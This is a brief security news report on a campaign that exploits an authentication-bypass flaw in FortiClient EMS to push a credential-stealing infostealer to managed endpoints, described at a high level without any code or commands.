Exploiting a Critical Server Flaw
Threat actors have been observed exploiting a critical vulnerability in FortiClient Endpoint Management Server (EMS) to distribute credential-stealing malware. The flaw, which carries a severity score of 9.1, allows an attacker to bypass authentication before an API call is made. This grants unauthorized access and enables privilege escalation on vulnerable servers. Fortinet addressed the issue in version 7.4.7 and later releases of FortiClient EMS.
Once the server is compromised, attackers modify configuration settings to delay firmware upgrade reminders. They also alter Remote Access Profile configurations and endpoint policies. This manipulation allows them to inject a malicious script that executes on managed endpoint devices. The attack was detected by Arctic Wolf in May 2026.
Infection Spread Through Legitimate Tools
The campaign leverages FortiClient’s own management pathway to push malicious PowerShell commands to managed endpoints. This method makes the attack resemble a normal administrative operation. The attackers use a legitimate FortiClient executable, fortitray.exe, to launch a script that triggers a Base64 encoded PowerShell command. That command downloads a payload named FortiEndpoint_Patch.exe, which appears to be a genuine update but is actually an information stealer.
The malware, identified as EKZ Infostealer, harvests sensitive data including passwords, cookies, and autofill information. The stolen data is then exfiltrated to a remote server via an HTTP request. Because the attack uses the EMS management infrastructure itself, every managed endpoint becomes a potential target without requiring a separate intrusion path to each device.
Source: The Hacker News
